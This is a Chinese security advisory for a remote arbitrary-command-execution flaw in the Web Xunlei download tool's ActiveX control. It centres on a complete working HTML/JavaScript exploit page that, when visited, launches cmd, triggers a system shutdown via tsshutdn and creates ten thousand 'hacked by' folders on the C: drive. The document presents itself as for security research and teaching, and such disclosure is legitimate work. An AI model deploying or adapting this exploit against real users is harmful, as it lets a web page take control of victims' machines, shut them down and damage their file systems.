web迅雷允许执行任意系统命令漏洞

影响版本:

XunLei web迅雷

漏洞描述:

Web迅雷是一款基于多资源超线程技术的下载工具，它继承了迅雷5的操作方便、高速下载的特点外，同时使用全网页化的操作界面，更符合互联网用户使用习惯，是国内第一款网页上的下载工具。

Web迅雷在实现上存在设计漏洞，程序会接收攻击者提供的恶意参数直接执行，远程攻击者可利用此漏洞控制用户受影响系统。

<*参考

http://www.inbreak.net/archives/165

*>

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

<html>
<head>
<title>迅雷执行任意系统命令</title>
</head>
<body>
运行迅雷加载项。
<script>
/**
*by kxlzx
*/
server = new ActiveXObject("ThunderServer.WebThunder.1");
if(server==null)
{
 alert("没装迅雷，请安装web迅雷");
 window.location.href="http://dl.xunlei.com/wxl.html";
}else{
 server.OpenDirectory("cmd");
 alert("要我帮你关机么？");
 alert("哎呀呀！悲剧啊！你怎么不小心点了确定了？");
 server.OpenDirectory("tsshutdn");
 //创建无数文件夹
 j = 10000;
 for(i=0;i<j;i++){
 server.CreatePathTree("c:\\hacked by kxlzx "+i);
 }
 setTimeout("alert('还愣着？赶快保存啊！')",50000);
}

</script>
</body>
</html>

安全建议:

厂商补丁：

XunLei
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dl.xunlei.com/wxl.html

// uedbox.com [2011-05-01]